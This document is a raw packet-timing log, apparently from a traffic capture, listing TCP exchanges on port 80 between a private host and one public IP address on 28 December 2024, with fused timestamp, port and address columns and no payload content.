                                                          Dec 28, 2024 09:29:42.033430099 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.064749002 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.064886093 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.108195066 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108311892 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108377934 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.108402967 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108409882 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.108448982 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.108520985 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108664989 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108675003 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108709097 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108839989 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108879089 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.108999014 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.109071970 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.109157085 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.109204054 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.109265089 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.109339952 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.109427929 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.109438896 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.109721899 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110125065 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110155106 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110177040 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110198021 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110265970 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110311031 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110311985 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110321045 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110361099 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110367060 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110410929 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110424995 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110440969 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110466957 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110482931 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110559940 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110577106 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110599995 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110615015 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110626936 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110661030 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110668898 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110706091 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110759020 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110769987 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110795975 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.110846043 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110879898 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110976934 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.110987902 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111052036 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111190081 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111200094 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111283064 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111293077 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111300945 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111399889 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111413002 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111422062 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111429930 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111506939 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111517906 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111649990 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111660004 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111690044 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111701012 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111746073 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111762047 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111857891 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111866951 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111900091 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111917019 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111968040 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.111985922 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.112056971 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.152914047 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.173676014 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.173764944 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.174093962 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.184416056 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.184482098 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.227932930 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.227953911 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.228075981 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.228087902 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.228132010 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.228143930 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.228156090 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229239941 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229249954 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229321003 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229367971 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229408979 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229459047 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229572058 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229629040 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229708910 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229724884 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229840994 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229851961 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229875088 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.229917049 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230026007 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230045080 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230083942 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230104923 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230247021 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230264902 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230334044 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230345011 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230462074 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230473042 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230551004 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230561018 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230685949 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230715990 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230725050 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230783939 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230833054 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230865002 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230947018 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230957031 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.230983973 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231067896 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231079102 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231097937 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231161118 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231234074 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231245041 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231345892 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231355906 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231390953 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231400967 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231437922 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231455088 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231509924 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231519938 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231559992 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231631994 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231647968 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231745958 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.231760025 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.293247938 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.293443918 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.505973101 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.625441074 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.625550032 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.634382010 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.753931046 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.753971100 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754014015 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754046917 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754110098 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754112959 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.754160881 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.754173994 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754192114 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.754211903 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754230976 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754236937 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.754290104 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.754295111 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754323959 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.754347086 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.754369974 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.873765945 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.873775005 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.873815060 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.873820066 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.873872042 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.873897076 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.873910904 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.873960972 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.873979092 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.917367935 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:42.917512894 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.036999941 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.037102938 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.077358961 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.077455997 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.196970940 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.197093964 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.357330084 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.357404947 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.557379961 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.557524920 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.643419981 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.643600941 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.643697023 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.677079916 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.677228928 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763281107 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763299942 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763326883 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763336897 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763354063 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763397932 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763437033 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763448000 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763494015 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763529062 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763540030 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763576984 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763602018 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763619900 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763650894 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763668060 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763756037 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763802052 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763828993 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763881922 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763895035 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763936996 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.763947010 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.763983965 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.764055967 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764151096 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764199972 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764308929 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764398098 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764509916 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764565945 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764655113 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764763117 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764816046 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764925003 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.764971972 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.764996052 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.765048981 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.765054941 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.765095949 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.765153885 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.765196085 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.765201092 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.765247107 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.765307903 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.765364885 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.765372038 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.765419960 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.796758890 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.796907902 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.845362902 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.845451117 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.883088112 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.883172989 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.883232117 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.883285046 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.883290052 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.883368015 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.883529902 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.883675098 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.883744001 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.883843899 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.883939028 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884069920 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884157896 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884258986 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884365082 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884385109 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884465933 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884510994 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884624958 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884680986 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884691000 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884809971 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884840012 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.884958982 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885036945 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885036945 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.885081053 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885092974 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885097980 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.885130882 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.885139942 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.885185957 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885221004 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885231018 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.885258913 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.885356903 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885401964 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.885516882 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885528088 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885533094 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885637999 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.885694027 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885713100 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885832071 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885901928 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.885957003 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886023998 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886068106 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886106968 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886229038 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886240959 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886351109 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886451006 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886499882 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886519909 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886668921 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886679888 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886725903 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886781931 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886866093 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886885881 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.886995077 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887012959 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887130022 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887170076 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887257099 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887274027 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887376070 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887428045 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887514114 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887650967 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887660980 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887671947 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.887784004 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.916383028 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.916513920 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.937016964 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.937340975 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:43.937484980 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.937598944 CET4970580192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:43.964914083 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.002883911 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.002897978 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.002908945 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.002965927 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.002994061 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004511118 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004652977 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004667044 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004718065 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004755974 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004825115 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004853010 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004941940 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.004997015 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005007982 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005045891 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005091906 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005100965 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005182981 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005198002 CET804970581.29.149.125192.168.2.7
